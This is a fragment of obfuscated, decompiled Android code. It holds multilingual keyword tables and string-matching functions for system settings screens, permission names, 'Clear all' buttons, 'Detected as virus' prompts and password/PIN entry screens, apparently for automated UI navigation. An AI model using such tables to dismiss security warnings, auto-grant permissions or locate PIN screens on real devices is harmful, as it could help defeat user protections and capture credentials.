        f55798e8 = AbstractC0716jf.m213306g5("允许开发设置", "允许开发者设置", "允許開發者設定", "允許開發設定", "開発者設定を許可", "개발자 설정 허용", "Cho phép cài đặt nhà phát triển", "อนุญาตการตั้งค่านักพัฒนา", "Izinkan setelan pengembang", "Benarkan tetapan pembangun", "Payagan ang developer settings", "डेवलपर सेटिंग्स की अनुमति दें", "ডেভেলপার সেটিংস অনুমতি দিন", "ڈویلپر سیٹنگز کی اجازت دیں", "السماح بإعدادات المطور", "אפשר הגדרות מפתחים", "اجازه تنظیمات توسعه\u200cدهنده", "Geliştirici ayarlarına izin ver", "Allow developer settings", "Autoriser les paramètres développeur", "Permitir configuración de desarrollador", "Permitir configurações de desenvolvedor", "Consenti impostazioni sviluppatore", "Entwicklereinstellungen zulassen", "Ontwikkelaarsinstellingen toestaan", "Tillåt utvecklarinställningar", "Tillat utviklerinnstillinger", "Tillad udviklerindstillinger", "Salli kehittäjäasetukset", "Разрешить настройки разработчика", "Дозволити налаштування розробника", "Zezwól na ustawienia programistyczne", "Povolit nastavení pro vývojáře", "Povoliť nastavenia pre vývojárov", "Fejlesztői beállítások engedélyezése", "Permiteți setările pentru dezvoltatori", "Να επιτραπούν οι ρυθμίσεις προγραμματιστή", "Разрешаване на настройки за програмисти");
        f55799e9 = AbstractC0716jf.m213306g5("软件信息", "軟體資訊", "Software information", "Software info", "ソフトウェア情報", "소프트웨어 정보", "Thông tin phần mềm", "ข้อมูลซอฟต์แวร์", "Informasi perangkat lunak", "Maklumat perisian", "Impormasyon ng software", "सॉफ़्टवेयर जानकारी", "সফ্টওয়্যার তথ্য", "سافٹ ویئر کی معلومات", "معلومات البرنامج", "מידע על תוכנה", "اطلاعات نرم\u200cافزار", "Yazılım bilgisi", "Yazılım bilgileri", "Informations sur le logiciel", "Información del software", "Informações do software", "Informazioni software", "Softwareinformationen", "Software-informatie", "Programvaruinformation", "Programvareinformasjon", "Softwareoplysninger", "Ohjelmistotiedot", "Сведения о ПО", "Відомості про ПЗ", "Informacje o oprogramowaniu", "Informace o softwaru", "Informácie o softvéri", "Szoftverinformáció", "Informații software", "Πληροφορίες λογισμικού", "Информация за софтуера", "Maelezo ya programu", "ဆော့ဝဲလ်အချက်အလက်", "ព័ត៌មាន\u200bកម្មវិធី", "ຂໍ້ມູນຊອບແວ", "सफ्टवेयर जानकारी", "මෘදුකාංග තොරතුරු", "የሶፍትዌር መረጃ");
        f55800f0 = AbstractC0716jf.m213306g5("MIUI 版本", "MIUI version", "MIUI-Version", "Version de MIUI", "Versión de MIUI", "Versão do MIUI", "Versione MIUI", "Версия MIUI", "MIUIバージョン", "MIUI 버전", "Phiên bản MIUI", "เวอร์ชัน MIUI", "Versi MIUI", "Versi MIUI", "Wersja MIUI", "Verze MIUI", "MIUI verzió", "Versiune MIUI", "Έκδοση MIUI", "Версия на MIUI", "MIUI sürümü", "MIUI-version", "MIUI-versjon", "MIUI-version", "MIUI-versio", "Версія MIUI", "MIUI-versie", "إصدار MIUI", "نسخه MIUI", "גרסת MIUI", "MIUI संस্करণ", "MIUI संस्करण", "MIUI phiên bản", "MIUI เวอร์ชัน", "Bersyon ng MIUI", "MIUI-version");
        f55801f1 = AbstractC0716jf.m213306g5("OS版本", "OS version", "OS-Version", "Version du système", "Versión de OS", "Versão do OS", "Versione OS", "Версия ОС", "OSバージョン", "OS 버전", "Phiên bản OS", "เวอร์ชัน OS", "Versi OS", "OS-version", "OS-versjon", "OS-version", "Käyttöjärjestelmäversio", "Версія ОС", "Wersja OS", "Verze OS", "Verzia OS", "OS verzió", "Versiune OS", "Έκδοση OS", "Версия на ОС", "OS sürümü", "OS-versie", "إصدار نظام التشغيل", "نسخه سیستم\u200cعامل", "גרסת מערכת ההפעלה", "OS संस्करण", "OS সংস্করণ", "Bersyon ng OS", "HyperOS version", "HyperOS版本");
        f55802f2 = AbstractC0716jf.m213306g5("ColorOS版本号", "ColorOS版本", "ColorOS version", "ColorOS-Version", "Version de ColorOS", "Versión de ColorOS", "Versão do ColorOS", "Versione ColorOS", "Версия ColorOS", "ColorOSバージョン", "ColorOS 버전", "Phiên bản ColorOS", "เวอร์ชัน ColorOS", "Versi ColorOS", "Wersja ColorOS", "Verze ColorOS", "ColorOS verzió", "Versiune ColorOS", "Έκδοση ColorOS", "Версия на ColorOS", "ColorOS sürümü", "ColorOS-version", "ColorOS-versjon", "ColorOS-versio", "Версія ColorOS", "ColorOS-versie", "إصدار ColorOS", "نسخه ColorOS", "גרסת ColorOS", "ColorOS संस्करण", "ColorOS সংস্করণ", "ColorOS phiên bản", "ColorOS เวอร์ชัน", "Bersyon ng ColorOS");
        f55803f3 = AbstractC0716jf.m213306g5("软件版本号", "軟體版本號", "ソフトウェアバージョン", "소프트웨어 버전", "Phiên bản phần mềm", "เวอร์ชันซอฟต์แวร์", "Versi perangkat lunak", "Versi perisian", "Bersyon ng software", "सॉफ़्टवेयर संस्करण", "সফ্টওয়্যার সংস্করণ", "سافٹ ویئر ورژن", "إصدار البرنامج", "גרסת תוכנה", "نسخه نرم\u200cافزار", "Yazılım sürümü", "Software version", "Software version number", "Version du logiciel", "Versión del software", "Versão do software", "Versione software", "Softwareversion", "Softwareversie", "Programvaruversion", "Programvareversjon", "Softwareversion", "Ohjelmistoversio", "Версия ПО", "Версія ПЗ", "Wersja oprogramowania", "Verze softwaru", "Verzia softvéru", "Szoftververzió", "Versiune software", "Έκδοση λογισμικού", "Версия на софтуера");
        f55804f4 = AbstractC0716jf.m213306g5("版本号", "版本號", "ビルド番号", "バージョン番号", "버전 번호", "빌드 번호", "Số phiên bản", "หมายเลขเวอร์ชัน", "Nomor versi", "Nombor versi", "Numero ng bersyon", "संस्करण संख्या", "সংস্করণ নম্বর", "ورژن نمبر", "رقم الإصدار", "מספר גרסה", "מספר גרסת Build", "شماره نسخه", "Sürüm numarası", "Version number", "Build number", "Numéro de version", "Número de versión", "Número da versão", "Numero versione", "Versionsnummer", "Versienummer", "Versionsnummer", "Versjonsnummer", "Versionsnummer", "Versionumero", "Номер версии", "Номер версії", "Numer wersji", "Číslo verze", "Číslo verzie", "Verziószám", "Număr versiune", "Αριθμός έκδοσης", "Номер на версията");
        f55805f5 = AbstractC0716jf.m213306g5("HarmonyOS版本", "HarmonyOS version", "HarmonyOS-Version", "Version de HarmonyOS", "Versión de HarmonyOS", "Versão do HarmonyOS", "Versione HarmonyOS", "Версия HarmonyOS", "HarmonyOSバージョン", "HarmonyOS 버전", "Phiên bản HarmonyOS", "เวอร์ชัน HarmonyOS", "Versi HarmonyOS", "Wersja HarmonyOS", "Verze HarmonyOS", "HarmonyOS verzió", "Versiune HarmonyOS", "Έκδοση HarmonyOS", "Версия на HarmonyOS", "HarmonyOS sürümü", "HarmonyOS-version", "HarmonyOS-versjon", "HarmonyOS-versio", "Версія HarmonyOS", "HarmonyOS-versie", "إصدار HarmonyOS", "نسخه HarmonyOS", "גרסת HarmonyOS", "HarmonyOS संस्करण", "HarmonyOS সংস্করণ", "HarmonyOS phiên bản", "HarmonyOS เวอร์ชัน", "Bersyon ng HarmonyOS");
        f55806f6 = AbstractC0716jf.m213306g5("软件版本", "軟體版本", "ソフトウェアバージョン", "소프트웨어 버전", "Phiên bản phần mềm", "เวอร์ชันซอฟต์แวร์", "Versi perangkat lunak", "Versi perisian", "Bersyon ng software", "सॉफ़्टवेयर संस्करण", "সফ্টওয়্যার সংস্করণ", "سافٹ ویئر ورژن", "إصدار البرنامج", "גרסת תוכנה", "نسخه نرم\u200cافزار", "Yazılım sürümü", "Software version", "Version du logiciel", "Versión del software", "Versão do software", "Versione software", "Softwareversion", "Softwareversie", "Programvaruversion", "Programvareversjon", "Softwareversion", "Ohjelmistoversio", "Версия ПО", "Версія ПЗ", "Wersja oprogramowania", "Verze softwaru", "Verzia softvéru", "Szoftververzió", "Versiune software", "Έκδοση λογισμικού", "Версия на софтуера");
        AbstractC0716jf.m213306g5("系统版本", "系統版本", "システムバージョン", "시스템 버전", "Phiên bản hệ thống", "เวอร์ชันระบบ", "Versi sistem", "Versi sistem", "Bersyon ng sistema", "सिस्टम संस्करण", "সিস্টেম সংস্করণ", "سسٹم ورژن", "إصدار النظام", "גרסת מערכת", "نسخه سیستم", "Sistem sürümü", "OS version", "System version", "Version du système", "Versión del sistema", "Versão do sistema", "Versione del sistema", "Systemversion", "Systeemversie", "Systemversion", "Systemversjon", "Systemversion", "Järjestelmäversio", "Версия системы", "Версія системи", "Wersja systemu", "Verze systému", "Verzia systému", "Rendszerverzió", "Versiune sistem", "Έκδοση συστήματος", "Версия на системата");
        AbstractC0716jf.m213306g5("已配对的设备", "已配對的裝置", "ペア設定済みのデバイス", "ペアリングされたデバイス", "페어링된 기기", "Thiết bị đã ghép nối", "อุปกรณ์ที่จับคู่", "อุปกรณ์ที่จับคู่แล้ว", "Perangkat disambungkan", "Perangkat yang dipasangkan", "Peranti gandingan", "Peranti yang dipasangkan", "Mga nakapares na device", "जोड़े गए डिवाइस", "युग्मित डिवाइस", "যোগ করা ডিভাইস", "পেয়ার করা ডিভাইস", "جوڑا بنائے گئے آلات", "جوڑے گئے آلات", "الأجهزة المقترنة", "מכשירים מותאמים", "دستگاه\u200cهای مرتبط\u200cشده", "دستگاه\u200cهای جفت\u200cشده", "Eşlenen cihazlar", "Eşleştirilmiş cihazlar", "Paired devices", "Appareils associés", "Dispositivos emparejados", "Dispositivos vinculados", "Dispositivos pareados", "Dispositivi accoppiati", "Gekoppelte Geräte", "Gekoppelde apparaten", "Parkopplade enheter", "Tilkoblede enheter", "Parrede enheder", "Laiteparit", "Yhdistetyt laitteet", "Подключенные устройства", "Сопряженные устройства", "Підключені пристрої", "Сполучені пристрої", "Sparowane urządzenia", "Spárovaná zařízení", "Spárované zariadenia", "Párosított eszközök", "Dispozitive asociate", "Συσκευές σε σύζευξη", "Συζευγμένες συσκευές", "Сдвоени устройства", "Vifaa vilivyooanishwa", "कनेक्ट गरिएका डिभाइस", "ອຸປະກອນທີ່ຈັບຄູ່ແລ້ວ", "ឧបករណ៍\u200bដែល\u200bបាន\u200bផ្គូផ្គង", "တွဲချိတ်ပြီး စက်ပစ္စည်းများ", "የተጣመሩ መሣሪያዎች", "යුගල කළ උපාංග");
        AbstractC0716jf.m213306g5("设备名称", "裝置名稱", "デバイス名", "기기 이름", "Tên thiết bị", "ชื่ออุปกรณ์", "Nama perangkat", "Nama peranti", "Pangalan ng device", "डिवाइस का नाम", "ডিভাইসের নাম", "آلے کا نام", "اسم الجهاز", "שם המכשיר", "نام دستگاه", "Cihaz adı", "Device name", "Nom de l'appareil", "Nombre del dispositivo", "Nome do dispositivo", "Nome dispositivo", "Gerätename", "Apparaatnaam", "Enhetsnamn", "Enhetsnavn", "Enhedsnavn", "Laitteen nimi", "Имя устройства", "Назва пристрою", "Nazwa urządzenia", "Název zařízení", "Názov zariadenia", "Eszköz neve", "Nume dispozitiv", "Όνομα συσκευής", "Име на устройството");
        AbstractC0716jf.m213306g5("正在等待", "正在等待配對", "待機中", "待ち受け中", "대기 중", "Đang chờ", "กำลังรอ", "Menunggu", "Menunggu", "Naghihintay", "प्रतीक्षा कर रहा है", "অপেক্ষা করছে", "انتظار کر رہا ہے", "في الانتظار", "ממתין", "در انتظار", "Bekliyor", "Waiting", "En attente", "Esperando", "Aguardando", "In attesa", "Warten", "Wachten", "Väntar", "Venter", "Venter", "Odotetaan", "Ожидание", "Очікування", "Oczekiwanie", "Čekání", "Čakanie", "Várakozás", "Se așteaptă", "Αναμονή", "Изчакване");
        f55807f7 = AbstractC0716jf.m213306g5("安全设置正在打开", "安全設定正在開啟", "セキュリティ設定を開いています", "보안 설정 열는 중", "Đang mở cài đặt bảo mật", "กำลังเปิดการตั้งค่าความปลอดภัย", "Membuka pengaturan keamanan", "Membuka tetapan keselamatan", "Binubuksan ang security settings", "सुरक्षा सेटिंग्स खोल रहा है", "নিরাপত্তা সেটিংস খুলছে", "سیکیورٹی سیٹنگز کھل رہی ہیں", "جاري فتح إعدادات الأمان", "פותח הגדרות אבטחה", "در حال باز کردن تنظیمات امنیتی", "Güvenlik ayarları açılıyor", "Security settings opening", "Opening security settings", "Ouverture des paramètres de sécurité", "Abriendo configuración de seguridad", "Abrindo configurações de segurança", "Apertura impostazioni di sicurezza", "Sicherheitseinstellungen werden geöffnet", "Beveiligingsinstellingen worden geopend", "Öppnar säkerhetsinställningar", "Åpner sikkerhetsinnstillinger", "Åbner sikkerhedsindstillinger", "Avataan suojausasetuksia", "Открытие настроек безопасности", "Відкриття налаштувань безпеки", "Otwieranie ustawień zabezpieczeń", "Otevírání nastavení zabezpečení", "Otváranie nastavení zabezpečenia", "Biztonsági beállítások megnyitása", "Se deschid setările de securitate", "Άνοιγμα ρυθμίσεων ασφαλείας", "Отваряне на настройки за сигурност");
        f55808f8 = AbstractC0716jf.m213306g5("仅在充电时启用", "僅在充電時啟用", "充電中のみ有効", "충전 중에만 사용", "Chỉ bật khi sạc", "เปิดเฉพาะตอนชาร์จ", "Aktifkan hanya saat mengisi daya", "Aktifkan hanya semasa mengecas", "I-enable lang kapag nagcha-charge", "केवल चार्जिंग के दौरान सक्षम करें", "শুধুমাত্র চার্জ হওয়ার সময় সক্রিয় করুন", "صرف چارج کرتے وقت فعال کریں", "تمكين أثناء الشحن فقط", "הפעל רק בזמן טעינה", "فقط هنگام شارژ فعال شود", "Yalnızca şarj olurken etkinleştir", "Enable only when charging", "Only when charging", "Activer uniquement en charge", "Activar solo al cargar", "Ativar apenas ao carregar", "Attiva solo durante la ricarica", "Nur beim Laden aktivieren", "Alleen inschakelen tijdens opladen", "Aktivera endast vid laddning", "Aktiver bare ved lading", "Aktivér kun under opladning", "Ota käyttöön vain latauksen aikana", "Включать только при зарядке", "Вмикати лише під час зарядки", "Włącz tylko podczas ładowania", "Povolit pouze při nabíjení", "Povoliť iba pri nabíjaní", "Csak töltés közben engedélyezze", "Activați doar la încărcare", "Ενεργοποίηση μόνο κατά τη φόρτιση", "Активиране само при зареждане");
        f55809f9 = AbstractC0716jf.m213306g5("确", "確", "Да", "Sí", "Oui", "Ja", "Sim", "Sì", "Evet", "כן", "نعم", "بله", "はい", "예", "Có", "ใช่", "Ya");
        f55810g0 = AbstractC0716jf.m213306g5("取", "否", "No", "不", "Non", "Нет", "Ні", "Nie", "Ne", "Nem", "Nu", "Όχι", "Hayır", "לא", "لا", "خیر", "いいえ", "아니요", "Không", "ไม่", "Hindi");
        AbstractC0716jf.m213306g5("使用密码", "使用PIN码", "使用PIN", "使用密碼", "使用PIN碼", "パスワードを使用", "PINを使用", "비밀번호 사용", "PIN 사용", "Dùng mật khẩu", "Dùng PIN", "ใช้รหัสผ่าน", "ใช้ PIN", "Gunakan kata sandi", "Gunakan PIN", "Guna kata laluan", "Guna PIN", "Gamitin ang password", "Gamitin ang PIN", "पासवर्ड का उपयोग करें", "PIN का उपयोग करें", "পাসওয়ার্ড ব্যবহার করুন", "PIN ব্যবহার করুন", "پاس ورڈ استعمال کریں", "PIN استعمال کریں", "استخدام كلمة المرور", "استخدام رقم PIN", "השתמש בסיסמה", "השתמש ב-PIN", "استفاده از رمز عبور", "استفاده از PIN", "Şifre kullan", "PIN kullan", "Use password", "Use PIN", "Enter PIN", "Utiliser le mot de passe", "Utiliser le code PIN", "Usar contraseña", "Usar PIN", "Usar senha", "Usar PIN", "Usa password", "Usa PIN", "Passwort verwenden", "PIN verwenden", "Wachtwoord gebruiken", "Pincode gebruiken", "Använd lösenord", "Använd PIN", "Bruk passord", "Bruk PIN", "Brug adgangskode", "Brug pinkode", "Käytä salasanaa", "Käytä PIN-koodia", "Использовать пароль", "Использовать PIN", "Використати пароль", "Використати PIN", "Użyj hasła", "Użyj kodu PIN", "Použít heslo", "Použít PIN", "Použiť heslo", "Použiť PIN", "Jelszó használata", "PIN használata", "Utilizați parola", "Utilizați PIN-ul", "Χρήση κωδικού πρόσβασης", "Χρήση PIN", "Използване на парола", "Използване на ПИН");
        f55811g1 = AbstractC0716jf.m213306g5("摄像头", "相机", "Camera", "攝影機", "カメラ", "카메라", "Máy ảnh", "กล้องถ่ายรูป", "Kamera", "Caméra", "Cámara", "Câmera", "Фотокамера", "Камера");
        f55812g2 = AbstractC0716jf.m213306g5("相册", "照片", "图片", "存储", "媒体", "Gallery", "Photos", "Pictures", "Storage", "Media", "ギャラリー", "写真", "ストレージ", "갤러리", "사진", "저장공간", "Galeri", "Foto", "Penyimpanan", "Galería", "Fotos", "Almacenamiento", "Galerie", "Speicher", "Галерея", "Фото", "Хранилище");
        f55813g3 = AbstractC0716jf.m213306g5("短信", "SMS", "信息", "Messages", "电话", "Phone", "网络", "Network", "メッセージ", "電話", "메시지", "전화", "Tin nhắn", "ข้อความ", "Pesan", "Mensajes", "Teléfono", "Messages", "Téléphone", "Nachrichten", "Telefon", "Сообщения", "Телефон");
        f55814g4 = AbstractC0716jf.m213306g5("麦克风", "录音", "麦克", "Microphone", "Record audio", "Audio", "マイク", "マイクロフォン", "마이크", "Micrô", "ไมโครโฟน", "Mikrofon", "Micrófono", "Microfone", "Микрофон");
        AbstractC0716jf.m213306g5("开关", "switch", "Switch", "toggle", "Toggle", "スイッチ", "스위치", "Công tắc", "สวิตช์", "Sakelar", "Interrupteur", "Interruptor", "Schalter", "Schakelaar", "Переключатель");
        AbstractC0716jf.m213306g5("配置中", "请稍后", "正在自动配置", "请勿操作设备", "配置完成后", "Configuring", "Please wait", "Auto configuring", "Do not operate", "Configuration complete");
        AbstractC0716jf.m213306g5("全部清除", "清除全部", "全部关闭", "关闭全部", "清空", "一键清理", "清理全部", "清除", "清理", "全部结束", "结束全部", "关闭所有", "清除所有", "一键关闭", "全清", "清理后台", "关闭后台", "全部停止", "停止全部", "结束所有", "Clear all", "Close all", "Clear", "Close", "End all", "Stop all", "Kill all", "Clear recent", "Close recent", "すべてクリア", "すべて閉じる", "모두 지우기", "모두 닫기", "Xóa tất cả", "Đóng tất cả", "ล้างทั้งหมด", "ปิดทั้งหมด", "Hapus semua", "Tutup semua", "Effacer tout", "Borrar todo", "Limpar tudo", "Alle löschen", "Alle sluiten", "Очистить все", "Закрыть все");
        AbstractC0716jf.m213306g5("关闭所有最近打开的应用", "关闭全部", "关闭所有", "清除全部", "清空全部", "清除所有应用", "关闭所有应用", "结束所有应用", "清理全部应用", "清除后台", "清理后台应用", "一键清理", "全部清除", "Close all apps", "Clear all apps", "End all tasks", "Close all recent apps", "Clear all recent apps");
        AbstractC0716jf.m213306g5("键盘", "keyboard", "Keyboard", "key", "按键", "输入", "input", "キーボード", "키보드", "Bàn phím", "แป้นพิมพ์", "Papan ketik", "Clavier", "Teclado", "Tastatur", "Toetsenbord", "Клавиатура");
        f55815g5 = AbstractC0716jf.m213306g5("病毒应用管控", "为病毒应用", "病毒應用管控", "Virus app control", "Detected as virus");
        AbstractC0715je.m213298i5(AbstractC0715je.m213298i5(AbstractC0715je.m213298i5(AbstractC0715je.m213298i5(AbstractC0716jf.m213306g5("请输入密码", "密码", "PIN", "图形密码", "数字密码", "请输入PIN", "请输入图形密码", "请输入数字密码", "密码输入", "PIN输入", "图形密码输入", "数字密码输入"), listM213306g54), listM213306g5), listM213306g52), listM213306g53);
        f55816g6 = AbstractC0716jf.m213306g5("tab", "Tab", "换行", "制表符", "切换", "タブ", "탭");
    }

    /* renamed from: a0 */
    public static List m212601a0() {
        return f55769b9;
    }

    /* renamed from: a1 */
    public static List m212602a1() {
        return AbstractC0715je.m213288h5(AbstractC0715je.m213298i5(AbstractC0715je.m213298i5(AbstractC0715je.m213298i5(AbstractC0715je.m213298i5(f55750a0, f55751a1), f55752a2), f55758a8), f55759a9));
    }

    /* renamed from: a2 */
    public static List m212603a2() {
        return f55762b2;
    }

    /* renamed from: a3 */
    public static List m212604a3() {
        return f55756a6;
    }

    /* renamed from: a4 */
    public static boolean m212605a4(String str) {
        String lowerCase = AbstractC0779a1.m213687e0(str).toString().toLowerCase(Locale.ROOT);
        t60.m214694b5(lowerCase, "this as java.lang.String).toLowerCase(Locale.ROOT)");
        List<String> listM213288h5 = AbstractC0715je.m213288h5(AbstractC0715je.m213298i5(AbstractC0715je.m213298i5(AbstractC0715je.m213298i5(f55750a0, f55758a8), f55759a9), f55752a2));
        if (listM213288h5 == null || !listM213288h5.isEmpty()) {
            for (String str2 : listM213288h5) {
                Locale locale = Locale.ROOT;
                String lowerCase2 = str2.toLowerCase(locale);
                t60.m214694b5(lowerCase2, "this as java.lang.String).toLowerCase(Locale.ROOT)");
                if (lowerCase.equals(lowerCase2)) {
                    return true;
                }
                String lowerCase3 = str2.toLowerCase(locale);
                t60.m214694b5(lowerCase3, "this as java.lang.String).toLowerCase(Locale.ROOT)");
                if (AbstractC0779a1.m213652a5(lowerCase, lowerCase3, false)) {
                    return true;
                }
            }
        }
        return false;
    }

    /* renamed from: a5 */
    public static boolean m212606a5(String str) {
        String lowerCase = AbstractC0779a1.m213687e0(str).toString().toLowerCase(Locale.ROOT);
        t60.m214694b5(lowerCase, "this as java.lang.String).toLowerCase(Locale.ROOT)");
        List<String> list = f55753a3;
        if (list == null || !list.isEmpty()) {
            for (String str2 : list) {
                Locale locale = Locale.ROOT;
                String lowerCase2 = str2.toLowerCase(locale);
                t60.m214694b5(lowerCase2, "this as java.lang.String).toLowerCase(Locale.ROOT)");
                if (lowerCase.equals(lowerCase2)) {
                    return true;
                }
                String lowerCase3 = str2.toLowerCase(locale);
                t60.m214694b5(lowerCase3, "this as java.lang.String).toLowerCase(Locale.ROOT)");
                if (AbstractC0779a1.m213652a5(lowerCase, lowerCase3, false)) {
                    return true;
                }
            }
        }
        return false;
    }
}
